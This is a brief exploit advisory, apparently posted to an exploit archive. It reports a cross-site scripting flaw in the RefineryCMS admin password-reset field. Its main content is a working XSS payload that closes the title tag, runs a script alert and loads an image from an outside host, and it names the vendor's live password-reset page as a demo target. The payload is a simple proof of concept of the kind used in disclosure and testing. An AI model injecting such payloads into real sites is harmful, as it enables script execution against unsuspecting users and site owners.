-------------------------------------------------------------------------------------------------------------
-Exploit Title : RefineryCMS Admin GUI / reset password field input - Cross-Site Scripting Vulnerabilitiy   -
-Vendor        : Refinery CMS - Refinery                                                                    -
-Homepage      : http://refinerycms.com/                                                                    -
-Author        : Jan L. (d4g4)                                                                              -
-Mail          : d4g4rcy@yahoo.de                                                                           -
-Version       : All Version                                                                                -
-Tested on     : GNU/Linux                                                                                  -
-Security Risk : High                                                                                       -
-dork          : -                                                                                          -
-------------------------------------------------------------------------------------------------------------
-Exploit       :                                                                                            -
-                                                                                                           -
-  </TITLE><SCRIPT>alert("XSS");</SCRIPT><img src=http://data6.blog.de/media/527/4072527_9ad9d031b3_m.jpg>  -
-                                                                                                           -
-------------------------------------------------------------------------------------------------------------
-Demo          :                                                                                            -
-                                                                                                           -
-http://refinerycms.com/users/password/new                                                                  -
-------------------------------------------------------------------------------------------------------------
-                                                                                                           -
-Greats        : MS&JP                                                                                      -
-------------------------------------------------------------------------------------------------------------